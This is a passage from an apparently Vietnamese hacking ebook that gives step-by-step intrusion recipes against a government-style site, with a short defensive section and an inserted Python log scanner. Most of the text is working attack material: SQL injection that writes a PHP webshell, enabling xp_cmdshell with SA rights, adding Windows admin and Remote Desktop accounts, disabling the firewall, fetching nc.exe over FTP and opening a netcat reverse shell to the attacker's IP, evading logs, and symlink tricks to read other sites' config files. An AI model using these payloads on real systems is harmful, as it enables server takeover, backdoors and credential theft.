    Khi bn chc chn c quyn FILE v xc nh c th mc ghi file, bn c th tin hnhghi bng cu lnh SQL:

    0 UNION SELECT columnname,null FROM tablenameINTO OUTFILE../../web/dir/file.txt

    Hoc l ghi bt c d liu g, khi ta khng bit tn bng v ct:

    1 OR 1=1 INTO OUTFILE ../../web/dir/file.txt

    Nu mun b cc k t splitting trong d liu, ta c th s dng INTO DUMPFILEthay vINTO OUTFILE

    Cng c th kt hp gia load_file() c cc file trn server

    0 AND 1=0 UNIONSELECT load_file() INTO OUTFILE

    Trong mt s trng hp ta cn s dng hex v unhex:

    0 AND 1=0 UNION SELECT hex(load_file()) INTO OUTFILE

    Hoc bn c th ghi bt c th gvo file, nh l webshell chng hn:

    0 AND 1=0 UNION SELECT '',null INTO OUTFILE ../../web/server/dir/hieupc.php


    y l 1 s vd:

    // PHP SHELL

    '


    2. K thut chim quyn Admin quaSA MSSQL Server:

    Sau y l mt v d thc t v chim quyn Admin qua SA m hieupc thc hin trn 1 serverVN m c ui l: GOV.VN (hieupc xin gi kn site ny v trnh site b ph hoi). Thngthng li nh sau l bn c th chim quyn Admin mt cch d dng nu Server xi quyn SA

    hoc l mt user c ngang quyn SA chng hn . check xem c lihay khng th thm du .V d:

    Check thng tin h thng ci no. Ta s dng cu lnh gp thng tin nh sau. V d:

    http://www.hieupc.gov.vn/hieupc.asp?id=1/**/and/**/1=convert%28int,@@servername%2bchar(124)%2bdb_name()%2bchar(124)%2bsystem_user%2bchar(124)%2b@@version)--sp_passwordKt qu:

    Kim tra xem System_User hin ti c quyn ngang = SA khng:

    i lc c nhng System_user c quyn ngang = SAnhng lc query chng ta khng thy n ctn l 'SA' nn thng bqua ...

    C 1 cch bn kim tra xem System_user c nm trong role sysadminkhng (ngang =SA)

    V dvictim l:

    www.hieupc.gov.vn/hieupc.asp?id=1


    Kim tra System_User

    www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,system_user)--sp_password

    Kt qu:

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'hieupc'to a

    column of data type int.

    Nh vy l System_userm Server ny ang dng c tn l hieupc,by gita thkim traxem hieupcc quyn ngang = SAkhng

    www.hieupc.gov.vn/hieupc.asp?id=1;drop table check_sysuser create table check_sysuser(id int identity,noi_dung

    varchar(1000)) insert into check_sysuser select sysadmin from master..syslogins where name = 'hieupc'--

    sp_password

    ===> to ra 1 table tn check_sysuserv chn gi trout put ca cu query select sysadminfrom master..syslogins where name = 'hieupc'vo trng noi_dungca table...

    http://www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select top 1 noi_dung%2b'/' from check_sysuser

    where id=1))--sp_password

    ===> Select gi trca trng noi_dung, bn ch %2bngha l du +.Kt qu:

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '1/ 'to a column of

    data type int.

    ===> Ngha l ti khon SQL hieupcc quyn ngang = SA. Trong bi ny Server m Hieupcang hack th user = quyn SA.

    Trng hp m bo li th ny:

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '0/ 'to a column of

    data type int.

    ===> Ngha l ti khon SQL hieupckhng c quyn hnh = SA, ta chc thkhai thc lythng tin nh bnh thng th c.

    Gita phi lm gnu c quyn SA trong tay?

    Enable xp_cmdshelltrn SQL Server 2005

    -Nh cbit th MSSQL Server 2005 mc nh l Disable lnh xp_cmdshell ngha l ngayckhi c ti khon SQL l "SA" ta cng khng thchy ccc cu lnh CMD:


    + For example, the victim is:

    www.hieupc.gov.vn/hieupc.asp?id=1 (on this site system_user has SA privileges). When we try to run the following CMD command:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'ipconfig /all'--sp_password

    The result returned shows no error.

    But since we hold "SA", it can still be enabled using sp_configure:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_configure 'show advanced options', 1--sp_password

    ===> this statement turns on show advanced options, which is required before xp_cmdshell can be enabled (because xp_cmdshell is one of those options)... If no error is reported and the page returns to:

    www.hieupc.gov.vn/hieupc.asp?id=1

    then it succeeded. Continuing:

    http://www.hieupc.gov.vn/hieupc.asp?id=1;reconfigure--sp_password

    ===> this statement runs reconfigure so that show advanced options takes effect... If no error is reported and the page returns to:

    www.hieupc.gov.vn/hieupc.asp?id=1

    then it succeeded. Continuing:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_configure 'xp_cmdshell', 1--sp_password

    ===> starts enabling xp_cmdshell... If no error is reported and the page returns to:

    www.hieupc.gov.vn/hieupc.asp?id=1

    then it succeeded. Continue with the reconfigure statement once more:

    http://www.hieupc.gov.vn/hieupc.asp?id=1;reconfigure--sp_password

    ===> this statement runs reconfigure so that xp_cmdshell takes effect

    After enabling xp_cmdshell, we try ipconfig /all again:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'ipconfig /all'--sp_password


    Result returned:

    Note: even with xp_cmdshell enabled, it is not certain that anything can be done on the server, because MSSQL Server 2005 does not allow commands such as "net user hieupc 123456 /add" to run; even activating the Guest user with "net user Guest /active" has no effect.
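    For the defending side, every request shown in this section leaves a trace in the web server's access log, because the injected SQL travels in the query string. The following is an added example, not part of the original ebook: a small Python scanner that flags the patterns used above. The log lines, IP addresses and function names are constructed for the illustration, and a seven-field W3C-style layout is assumed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# (label, pattern, severity) for the request patterns shown in this section.
INDICATORS = [
    ("sp_password suffix", re.compile(r"--\s*sp_password", re.I), 1),
    ("convert(int, ...) error extraction", re.compile(r"convert\s*\(\s*int\s*,", re.I), 2),
    ("stacked statement", re.compile(r";\s*(?:exec|drop|create|insert|reconfigure)\b", re.I), 2),
    ("sp_configure change", re.compile(r"\bsp_configure\b", re.I), 3),
    ("xp_cmdshell call", re.compile(r"\bxp_cmdshell\b", re.I), 3),
]

# Constructed sample log (assumed field order is given in the #Fields line).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2009-09-09 10:00:01 192.0.2.10 GET /hieupc.asp id=1 200
2009-09-09 10:00:05 198.51.100.7 GET /hieupc.asp id=1+and+1=convert(int,system_user)--sp_password 500
2009-09-09 10:00:09 198.51.100.7 GET /hieupc.asp id=1;exec+sp_configure+'show+advanced+options',+1--sp_password 200
2009-09-09 10:00:12 198.51.100.7 GET /hieupc.asp id=1;reconfigure--sp_password 200
2009-09-09 10:00:15 198.51.100.7 GET /hieupc.asp id=1;exec%20master..xp_cmdshell%20'ipconfig%20/all'--sp_password 200
2009-09-09 10:01:00 192.0.2.10 GET /search.asp q=convert+pdf+to+int 200
"""


def parse_line(line):
    """Split one log line into a record; return None for comments and bad lines."""
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != 7:
        return None
    date, time, ip, _method, stem, query, status = parts
    # Decode %20, %2b and '+' so encoded variants match the same patterns.
    return {"ts": f"{date} {time}", "ip": ip, "stem": stem,
            "query": unquote_plus(query), "status": int(status)}


def scan(log_text):
    """Return one finding per request whose query string matches an indicator."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line.strip())
        if rec is None:
            continue
        hits = [(label, sev) for label, rx, sev in INDICATORS if rx.search(rec["query"])]
        if hits:
            findings.append({**rec,
                             "labels": [label for label, _ in hits],
                             "severity": max(sev for _, sev in hits)})
    return findings


def summarize(findings):
    """Group findings per client so an escalating sequence stands out."""
    per_ip = defaultdict(lambda: {"requests": 0, "max_severity": 0, "labels": set()})
    for f in findings:
        entry = per_ip[f["ip"]]
        entry["requests"] += 1
        entry["max_severity"] = max(entry["max_severity"], f["severity"])
        entry["labels"].update(f["labels"])
    return dict(per_ip)


if __name__ == "__main__":
    for ip, info in summarize(scan(SAMPLE_LOG)).items():
        print(ip, info["requests"], info["max_severity"], sorted(info["labels"]))
```

    A client that moves from the convert(int, ...) errors to sp_configure and xp_cmdshell within a few requests is the sequence to alert on; the benign search request in the sample is not flagged.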

    Add thm user vo MSSQL Server:

    By givn Victim l

    www.hieupc.gov.vn/hieupc.asp?id=1

    Add thm user vo SQL Server lm g ? L ta c thlogin vo MSSQL Server ca hbngQuery Analyzer trong Microsoft SQL Server c thvit Query va nhanh v ddng hn(hoc nm vng cng cc tt).Ngoi ra ta c th s dng: RazorSQL connect.

    utin l to ra user:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_addlogin 'hieupc', '123456'--sp_password

    ===> Ta va to thm 1 user trong SQL Server ca n vi username l hieupc v password l123456. Nu n khng bo li g m trli trang:

    www.hieupc.gov.vn/hieupc.asp?id=1

    Th kt qu l thnh cng. Khi c user ri th ta phi add n ln quyn qun trcao nht

    (ngang = SA)

    www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_addsrvrolemember 'hieupc', 'sysadmin'--sp_password

    Nu n khng bo li g m trli trang:

    www.hieupc.gov.vn/hieupc.asp?id=1

    Th kt qu l thnh cng.


    By gi ta dng Query Analyzer hoc RazorSql connect v login vo th xem sao (nhng chpdng cho server MSSQL cho remote txa nh. V mt s server cm remote MSSQL t xa.)

    Kt qu:

    V ti y ri, cc bn lm c rt nhiu iu hay lm y.

    Chim quyn Admin v Remote Desktop nh sau:S dng cu lnh CMD sau add thm user cho window vi username = hieupc v password =123456:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net user hieupc 123456 /add'--sp_password

    Kt qu nh sau l thnh cng:

    add user hieupc vo group administrators, ta lm nh sau:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net localgroup administrators hieupc /add'--

    sp_password

    Kt qu nh sau l thnh cng:


    By gi ta add user hieupc vo group Remote Desktop Usersn c quyn Remote Desktop:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net localgroup "Remote Desktop Users" hieupc

    /add'--sp_password

    Kt qu nh sau l thnh cng:

    Vy l by gibn c thm 1 ti khon admin vi password l 123456 vi quyn hthng vc thremote desktop.Chn remote desktopnh sau :(Start->programs->accessories->communications->Remote Desktop)

    Hoc vo run g "mstsc"

    Gichcn in IP hoc domainname (www.hieupc.gov.vn)nh user v pass vo login voserver v lm nhng g mnh mun.

    Kt qu l remote desktop c vo server:

    Upload Backdoor ln Server nh th no qua quyn SA:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo open ftp.Your_Domain.com>ftp&echo user

    Your_User Your_Pass>>ftp&echo get Your_File>>ftp&echo quit>>ftp'--sp_password


    Sau y l cch gii quyt:Site demo vn l:

    www.hieupc.gov.vn/hieupc.asp?id=1

    Nh cc bn bit l Registryhay cn gi l Regeditrt quan trng trong hthng cawindow , khi c system_user = 'SA'trong tay th bn c thtng tc vo registryca my ch.V vytaphi can thip vo Regedit Enable mt vi th:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_regwrite

    HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Control\TerminalServer','fDenyTSConnections',REG_DWORD,0--sp_password

    ===> ghi kha registry cho fDenyTSConnectionsvi gi tr= 0

    Tip tc cu lnh:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_regwrite

    HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Control\Terminal

    Server','AllowTSConnections',REG_DWORD,1--sp_password

    ===> ghi kha registry cho AllowTSConnectionsvi gi tr= 1

    Sau :

    www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,@@servername)--sp_password

    ===> ly tn server cn khi ng li.

    V s dng cu lnh sau restart li my 'shutdown -m \\tn_server r t 5'

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'shutdown -m \\tn_server r t 5'--sp_password

    ===> restart my no.


    Mt s iu cn ch :


    Delete 1 kha registry nh sau:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec xp_regdeletekey 'rootkey', 'key'--sp_password

    ===> cc bn ch 'rootkey' v 'key' l ng dn n kha registry ...

    V dhieupc mun xa kha registry TestValue 'HKEY_LOCAL_MACHINE\SOFTWARE\Test'th sl:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE',

    'SOFTWARE\Test\TestValue'--sp_password

    c gi tr1 kha registry nh sau:

    V dbn mun c kha registry fDenyTSConnectionsHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server xem n c

    gi tr= bao nhiu th bn u tin phi query:

    www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung1 varchar(99),

    noi_dung2 varchar(99)) insert into hieupc EXEC master..xp_regread

    'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'--

    sp_password

    ===> to ra 1 table lu trgi trregistry ca kha

    Sau bn phi select dliu trong ra xem:

    www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select top 1 noi_dung1%2b'/'%2bnoi_dung2 from hieupc

    where id=1))--sp_password

    ===> %2b= du +

    Nu n hin li:

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value

    'fDenyTSConnections/0'to a column of data type int.===> c ngha l kha fDenyTSConnectionsc gi tr= 0

    Ghi thm v Sa gi trca kha registry nh sau:

    V dHieupc ssa gi trca fDenyTSConnectionsHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server thnh 1

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_regwrite

    HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Control\Terminal

    Server','fDenyTSConnections',REG_DWORD,1--sp_password

    Mtvi iu cn lu vRemote Desktop:

    Khi m c SA v bn add thm thnh cng ti khon Admin , nhng khi bn connect voRemote Desktop ca Server th li khng c. Vy phi lm g tip theo y?

    Lc ny ta phi enable ci Terminal Service bng cch:

    Sc config TermService start= auto

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'Sc config TermService start= auto'--sp_password

    Enable xong th ta phi start TermService:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net start TermService'--sp_password

    M Port trong Firewallcho Remote Desktop:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'netsh firewall add portopening TCP

    3389 Remote Desktop'--sp_password

    By gi ta th connect Remote Desktop vo Server th xem sao.

    Ngoi rabn cn lm thm vi cu lnh sau nu vn khng connectc vo Remote Desktop:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell netsh firewall set service remoteadmin

    enable'--sp_password

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell netsh firewall set service remotedesktop

    enable'--sp_password

    Ch thm:

    Thng thng l 1 Server khng cbt Firewall (nu c thng l firewall phn cng), nhngnu trong trng hp Server bt firewall, v chn 1 ng dng connect ca bn (nh Remote

    Desktop chng hn) th sao? (v dnh chn netcat) th bn hy tham kho cch sau:

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'netsh firewall set opmode enable disable'--

    sp_password


    Server c enable nhng IP MSSQL Server khng trng vi ip Server cha web, ta lm nhsau:

    Bn cn tm ra IP chnh xc ca MSSQL Server

    www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung varchar(1000))

    insert into hieupc exec master..xp_cmdshell 'ipconfig'--sp_password

    ===> to ra 1 bng lu trthng tin ca lnh ipconfig

    Sau

    www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select noi_dung from hieupc where id=8))--sp_password

    Kt qu:

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'IP Address. . . . . . . .

    . . . . : xxx.xxx.x.xxx'to a column of data type int.

    ==> xxx.xxx.x.xxxchnh l ip ca MSSQL Server.Vy l bn c IP ca MSSQL , nhng nu n l IP mng LAN th sao ?. Th bn phi dngn netcat, bn phi up netcatln server v kt ni tserver vmy ca bn , u tin bn phiupload file netcatln 1 host ftp ca mnh: (ci ny c hng dn bi trn, xem chi tit trn nh)

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo open ftp.your-host.com>>ftp'--sp_password

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo user your-ftp-username your-ftp-pass>>ftp'--

    sp_password

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo get nc.exe>>ftp'--sp_password

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo quit>>ftp'--sp_passwordwww.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'ftp -v -i -n -s:ftp'--sp_password

    By gibn copy file netcat (nc.exe) vo C:\ ca mnh, vo cmd v g lnh cd\ di chuynti C:\sau g nc -l -p 1787 -vv

    www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'nc.exe-e cmd.exe -d your-ip1787'--sp_password

    hoc

    www.hieupc.gov.vn/hieupc.asp?id=1;select%20*%20from%20openrowset('sqloledb','server=BACKUP;uid=BUILTIN\Administrators;pwd=','set%20fmtonly%20off%20select%201%20exec%20master..xp_cmdshell%20"nc.exe-e

    cmd.exe -d 58.187.32.401787"')--sp_password

    58.187.32.40 hocyour ip : l a ch IP ca bn, xem a ch IP ca bn bng cch vo: ip2location.com

    Lu :Nu connect thnh cng vo NCth bn hu nh remote c vo Server v c th lmnhngg bn thch.


    Nu Server change port Remote Desktop th sao:

    www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung1 varchar(99),

    noi_dung2 varchar(99)) insert into hieupc EXEC master..xp_regread

    'HKEY_LOCAL_MACHINE','System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-

    Tcp\','PortNumber'--sp_password

    Query ly kt qu no

    www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select top 1 noi_dung1%2b'/'%2bnoi_dung2 from hieupc

    where id=1))--sp_password

    Kt qu tr li:

    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'PortNumber/xxxx'

    to a column of data type int.

    ===> nu xxxx khc 3389 th xxxx chnh l cng Remote Desktop mi m Server change (v

    3389 l cng mc nh ca Remote Desktop)Vy khi bn connect ti server bn phi thm xxx vo sau IP ca server.

    Nu gp user khng phi l SA th sao:

    Ti sao li phi a Guest vo DataBase Owner caDataBase Master?Bv DB Owner ca Db Master mi c quyn thc hin lnh xp_regwrite,xp_regdeletevaluev xp_cmdshell.

    Ti sao Guest li sdng 2 lnh xp_regwrite,xp_regdeletevalue vxp_cmdshellBi v :

    xp_regwritedng thc hin lnh ghi ln Registry ca Windowsxp_regdeletevaluedng xa dliu trong Registry ca Windowsxp_cmdshelldng gi lnh ln Windows dng nng quyn , chim quyn , ci backdoor..... s

    Cn y l lnh a Guest vo Db Owner ca Db Master:

    http://www.victim.com/index.asp?id=1;exec sp_executesql N'create view dbo.test as select * frommaster.dbo.sysusers'exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' execsp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''Guest''','xx' exec sp_executesql N'dropview dbo.test'--sp_password

    Nu chy link trn m khng bo li v c trvtrang :

    http://www.victim.com/index.asp?id=1

    tc l bn thc hin thnh cng vic a Guest vo Db Owner ca Db Master nhng chochc n mnh vn kim tra li mt ln na bng cch sau :

    http://www.victim.com/index.asp?id=1%20%20and%201=convert(int,(select%20top%201%20name%20from%20master..sysusers%20where%20roles=0x01%20and%20name%20not%20in('dbo')))--sp_password

    Vy l xong gith thoi mi chy xp_regwritevi cxp_cmdshell


    C thchy xp_regwrite ,xp_regdeletevalue vixp_cmdshellri th lm g?Gilogin vo Database vi user BUILTIN\ADMINISTRATOR vi password = "xx":

    http://www.victim.com/index.asp?id=1;exec%20sp_executesql%20N'create%20view%20dbo.test%20as%20select%20*%20from%20master.dbo.sysxlogins'%20exec%20sp_msdropretry%20'xx%20update%20sysusers%20set%20sid=0x01%20where%20name=''dbo''','xx'%20exec%20sp_msdropretry%20'xx%20update%20dbo.test%20set%20xstatus=18%20where%20name=''BUILTIN\ADMINISTRATORS''','xx'%20exec%20sp_executesql%20N'drop%20view%20dbo.test'--sp_password

    Vy l ta c mt user nm vng trong DBca Server ... Sau ny mi mnh lnh phi thngqua user nyGimnh dng xp_regwriteEnable ci OpenRowset bSysAdmin kia Disable.

    http://www.victim.com/index.asp?id=1;exec master..xp_regwriteHKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1--sp_password

    http://www.victim.com/index.asp?id=1;exec master..xp_regwriteHKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0--sp_password

    my chin m nh:1 : Enable

    0 : Disable

    Chy xong m n trvtrang chl thnh cng khi checkGith xi xp_regdeletevaluehy chc nng ghi log v lc dliu ca WINDOWS

    http://www.victim.com/index.asp?id=1;exec master..xp_regdeletevalue'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters'--sp_password

    Gith cc bn khi lo bghi log, chnh v thmnh bci sp_password i cng c, nhngbn li cng chng sao.Gin lc bt ci xp_cmdshellln. Cc bn lu nha trn l cho php chy xp_cmdshellcn y l bt xp_cmdshellv allow updates.

    http://www.victim.com/index.asp?id=1;select * from openrowset('sqloledb','server=BACKUP;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedprocxp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ' '1'' reconfigure with override')--sp_passwordn y th ta c na ng ri, khai thc tip bng cch trn c trnh by.


    3. What you need to know about local hacking:

    Hieupc knows that nowadays probably everyone has heard of local hacking, that the method is fairly simple, and that there are plenty of tricks for exploiting it. The few articles included in this ebook below are for reference and to share Hieupc's experience with local hacking, so readers are welcome to offer their own comments if anything is incorrect or missing. Many thanks.

    Local hack and how to prevent it (Author: Pham Duc Hai):

    This article is written so that administrators and security practitioners can understand local hack attacks more clearly. Although the technique has been common for a long time, I think that many servers, not only in Vietnam but abroad as well, are still affected, and sometimes a new bug makes it usable again. I also believe many of you know how to carry out a local attack but do not know how to fix the problem.

    What is local hack:

    Put simply, it is a local attack. Local here means on the same machine (server). How is this attack carried out?

    Suppose we need to attack the target site www.site1.com, but after analysing the situation we find that attacking this site directly is very hard. Through reconnaissance we also learn that the server hosts many other sites. The idea: attack another site on the same server, then use that site as a stepping stone to attack the target site.

    What kinds of local hack are there? For now I divide them into 3 kinds: Unix local, Windows local and FTP local. Probably many of you only know local hack on Unix and not the other two. Unix local means the server runs Unix, likewise for Windows local, and FTP local means local access through FTP.

    What all of these have in common is step 1, finding the sites on the same server. The general term for this is Reverse IP. The following tools can be used to identify the sites on the same server:

    http://www.domaintools.com/reverse-ip/ --> this one recently became a paid service

    http://www.ip-adress.com/reverse_ip/ --> this one is free and works quite well.

    http://www.seologs.com/ip-domains.html --> this one has the advantage of covering Vietnamese domain names, but returns fewer results than the site above

    After the step above comes the step of finding a vulnerable site to use as the stepping stone. Here the kinds differ, so I will cover each one separately.

    Unix local:

    Probably php-mysql sites on Unix are the most common today, so I will concentrate on those. The search for bugs proceeds along the following lines:

    - If the site uses identifiable source code, for example open source, the first thing is to go to bug-announcement sites and check whether the version in use has any known bug. You can look on http://milw0rm.com/ or http://www.securityfocus.com/ ... to find bugs.

    - If the step above fails, or the code was developed in-house, the only way is to sit down and look for yourself. At this point it depends mainly on the experience and skill of the person hacking. Commonly used and fairly easy to spot flaws: SQL injection, PHP file include, default installations of applications such as editor components, unauthenticated file upload, file upload without filtering, or filtering combined with Apache unknown extensions,... a great many flaws can be exploited. I will not go into detail on how these flaws are used and exploited.

    After a flaw is found, the goal is to upload a shell so that the next step can proceed. Whether a shell can be uploaded depends a great deal on how well the site's admin has set CHMOD. I will assume a shell has been uploaded. From here we start trying to go local to the target site. If safe mode is OFF and local access is easy there is nothing more to say; the target site can be penetrated. If safe mode is ON and local access is difficult, one needs to know about safe mode bypass bugs. These depend on the PHP version and on whether the functions that could be used are disabled. If PHP safe mode bypass is not used, LOAD DATA LOCAL INFILE can be used; Yen has already written an article about this.

    If none of the methods above work, we turn to whether it is possible to get root, that is, take control of the server. This depends on the operating system kernel and on whether software installed on the server has an overflow bug... In short, once a shell is in place everyone has their own way, depending on ability.

    --> How to fix?

    To avoid the problems above, software must be kept updated and configured correctly (I will go into detail in another article).

    - Turn safe mode ON

    - Upgrade PHP to the newest version

    - In php.ini, disable sensitive functions and functions that can be used for safe mode bypass (this requires the admin to keep up to date constantly)

    - For virtual hosts the open_basedir parameter is very important; it must be set correctly to the web directory of each site

    - CHMOD carefully (you need to read up on how to CHMOD)

    - Upload forms must filter files...

    - In the my.conf file add the line set-variable=local-infile=0 to prevent the LOAD DATA LOCAL INFILE problem

    Windows local:

    Finding a vulnerable site is basically the same as in the previous part; the only difference lies in the characteristics of the programming language, so that aspect needs closer examination.

    Local access is possible in the following situations: permissions are poorly assigned (usually a shared group, with group permissions set carelessly), or the server has not blocked command execution. All shells running on Windows share one characteristic: they use FSO (File System Object). If this is handled carefully and cmd.exe is moved away, there is no way to run cmd.

    That is without even mentioning that antivirus programs are very sensitive to FSO, so it is easily detected.

    --> How to fix?

    Good permission separation: it is best to use Windows 2003 Server, with each site running in its own pool, although that uses more resources. The account that runs each site is separate, and the account that runs ASP.NET is different from the account that runs asp, php,... Setting permissions is extremely important; to do this well, read further documentation and follow Microsoft's security checklists. Note that the Default pool must not be used. Dedicated servers very often have this problem, because the admins of those servers stop once things are installed and running; on the other hand, dedicated servers usually run only a few sites. This is where the main danger lies: if a dedicated server is attacked, the likelihood of losing control and losing a lot of data is very high.

    FTP local:

    This sounds strange, but exploiting it is extremely simple. I will use my own site as an example.

    As you can see in the picture, I logged in to my own FTP account, yet I can get into all the other FTP accounts on the same server.

    So where is the flaw? It may be due to 2 possibilities:

    - The Fix Home dir parameter (I don't remember the exact name) is not set

    - All FTP users share one group, and that group has rights over all the directories of the member accounts.

    --> How to fix? From what I have presented above you already know how to fix it.

    This article is a summary; for the first 2 parts I did not include illustrations because they are quite common and many illustrated articles already exist.


    Kinh nghim ca Hieupc v LocalHack:

    - Hin nay khi hack local a s cc server u bt tnh nng safe mode ONvDisablefunctions:phpinfo, lynx, proc_open, symlink, readlink, wget, system, exec, shell_exec, passthru, pcntl_exec, proc_close,proc_get_status, prus, proc_nice, proc_terminate, popen, pclose, virtual, openlog, escapeshellcmd,escapeshellarg,

    show_source, dl, chgrp, chownv vy ta khng th lm c g. V d v 1 server nh vy hnhdi:

    y l trng hp Safe Mode OFF:

    - PHP version 5.2.10 nh trong hnh hin nay vn rt kh hack local, nhng i vi nhng phinbn thp hn th ta vn c th local bng: Symlink, dng readfile("th mcweb/user/home/public_html/link file"); .Ngoi ra ta cng c th dng cat filequa Mysql hocMSSQL nu bn c 1 user Mysql hoc MSSQL trong tay, tt nhin l cng Server nh.

    V d:readfile("/etc/passwd"); trong shell R57


    Cat file qua mysql:

    $port = "3306";$user = "root";$pass = "";$database = "test";$file = "/etc/passwd";$db = @mysql_connect('localhost:'.$port,$user,$pass);

    $sql = "DROP TABLE IF EXISTS temp_vniss_test;";@mysql_query($sql);$sql = "CREATE TABLE `temp_vniss_test` ( `file` LONGBLOB NOT NULL );";@mysql_query($sql);$sql = "LOAD DATA INFILE \"".$file."\" INTO TABLE temp_vniss_test;";@mysql_query($sql);$sql = "SELECT * FROM temp_vniss_test;";$r = @mysql_query($sql);while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }$sql = "DROP TABLE IF EXISTS temp_vniss_test;";@mysql_query($sql);

    @mysql_close($db);

    Tng t vi mssql:

    $port = "1433";$user = "root";$pass = "";$database = "test";$file = "/etc/passwd";

    $db = @mssql_connect('localhost,'.$port,$user,$pass);@mssql_query("drop table temp_vniss_test",$db);@mssql_query("create table temp_vniss_test ( string VARCHAR (500) NULL)",$db);@mssql_query("insert into temp_vniss_test EXEC master.dbo.xp_cmdshell '".$file."'",$db);$res = mssql_query("select * from temp_vniss_test",$db);while(($row=@mssql_fetch_row($res))){echo $row[0]."\r\n";}@mssql_query("drop table temp_vniss_test",$db);@mssql_close($db);

    - C mt cch bn c th xi shell script trn server nu PHP version l : 5.2.10hoc mi hn,nu bn c mt host trn server v c user + pass FTP th lc ny mi chuyn nh n ginhn v bn ch cn upload con shell ln v bt u khai thc bng cch Symlink. Symlink bngcch sau:

    V d th mc cha web c dng l:

    /home/hieu/domains/hieu.net/public_html/Th mc cha web ca site mnh cn symlink l:

    /home/hieupc/domains/hieupc.com/public_html/


    Gi th khai thc ly file config.php v host ca mnh nh:

    ln -s /home/hieupc/domains/hieupc.com/public_html/config.php 12345.txt

    File ta symlink v l config.php, link vi 12345.txt trn host ca mnh.

    Gi ta xem ci no:

    http://hieupc.com/12345.txt

    Kt qu hin ra l file config.php bn site m mnh ang attack:

    Thng qua cch ny ta c th lm c kh nhiu chuyn nh ly cpass ca Mysql t fileconfig ca sitev t y ta c th khai thc tip chim quyn admin ca site . Cch nyc gi l local hack thng.qua Mysql.

    -Nu website b li LFI hoc RFI th ta c th dng li ny a shell vo v khai thc nhbnh thng. Tm hiu thm v dng hack ny vnbrain.net hoc hcegroup.net

    - Cc bn cng c th get rootqua nhng kernel linux b li m server cha upgrade . Ci ny lnmilw0rm.com cp nht thm.

